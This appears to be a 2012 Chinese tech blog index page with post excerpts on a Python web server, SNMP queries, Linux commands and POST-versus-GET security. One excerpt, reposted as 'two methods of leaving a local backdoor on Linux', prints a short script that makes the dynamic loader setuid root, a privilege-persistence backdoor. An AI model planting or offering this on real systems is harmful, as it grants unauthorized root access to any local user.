技术相关

常简单的Python HTTP服务(转)

wangjun 发表于 2012-01-26, 11:08 PM

如果你急需一个简单的Web Server,但你又不想去下载并安装那些复杂的HTTP服务程序,比如:Apache,ISS等。那么, Python 可能帮助你。使用Python可以完成一个简单的内建 HTTP 服务器。于是,你可以把你的目录和文件都以HTTP的方式展示出来。佻只需要干一件事情,那就是安装一个Python。

» 阅读全文

发表在: 技术相关 0 条评论 阅读 109 次

snmp信息的使用

wangjun 发表于 2012-01-06, 10:58 PM

常用 SNMP 对象 ID

sysDescr.0                1.3.6.1.2.1.1.1.0
sysObjectID.0             1.3.6.1.2.1.1.2.0
sysUpTime.0              1.3.6.1.2.1.1.3.0
sysContact.0               1.3.6.1.2.1.1.4.0
sysName.0                 1.3.6.1.2.1.1.5.0
sysLocation.0            1.3.6.1.2.1.1.6.0
sysServices.0           1.3.6.1.2.1.1.7.0
ifNumber.0                1.3.6.1.2.1.2.1.0
tcpCurrEstab.0
 
snmpget -v 2c -c public 192.168.21.159 sysName.0
获取设备的名字
 
snmpwalk -v 2c -c public 192.168.21.159
遍历snmp树
 
snmpstatus -v 2c -c public 192.168.21.159
获取简化的系统状态
 
参考文章
发表在: 技术相关 0 条评论 阅读 108 次

继续爆料:linux下留本地后门的两个方法(转)

wangjun 发表于 2012-01-05, 11:08 PM

    公司某群中有人问 bash_profile 里PATH设置成 "." 有啥危害,有人发了这篇文章出来,某大牛发了一段shell脚本。

#!/bin/sh

rm -f ./ls
chmod 4755 /lib64/ld-linux-x86-64.so.2
/bin/ls

 


 

» 阅读全文

发表在: 技术相关 0 条评论 阅读 132 次

Linux常用命令

wangjun 发表于 2011-10-17, 9:52 PM

一些常用Linux命令,非常有用

» 阅读全文

发表在: 技术相关 1 条评论 阅读 545 次

POST比GET安全?

wangjun 发表于 2011-10-09, 9:58 AM

      最近有个项目是对某银行做渗透测试,找出潜在的安全漏洞。由于我们这里经验不足,渗透工作主要是总部研究院的同事做的。在他们提交的渗透测试报告中提到 “大部分的POST请求都可直接转换为GET请求” ,很明显是想说POST比GET安全。后来去银行做渗透测试结果交流的时候,银行的技术员问到为啥POST比GET安全。。一时不知道该从何说起,只知道GET提交的参数浏览器会缓存,如果通过GET提交帐号和密码进行登录,其他人查看浏览器的历史纪录,那么别人就可以拿到你的账号和密码了,但是现在基本上没有人用GET提交帐号和密码吧?另外web服务器的日志中也会有记录, HTTP头部的referer里会记下URL里请求数据。。基本上就这些。。说服力不是很强。回来后找了下资料,下面这篇文章讲得比较全面。应该是参考了网上一些资料后总结出来的。

» 阅读全文

发表在: 技术相关 0 条评论 阅读 906 次
Total: 65Page 1 of 131234567Next ›Last »